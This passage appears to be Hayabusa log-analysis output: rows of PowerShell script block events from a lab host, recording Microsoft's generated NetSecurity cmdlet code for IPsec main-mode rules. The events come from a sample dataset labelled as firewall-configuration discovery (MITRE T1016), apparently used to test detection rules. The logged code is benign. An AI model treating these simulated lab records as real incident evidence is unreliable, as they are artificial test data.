-and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(Pa",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFire",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"wallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 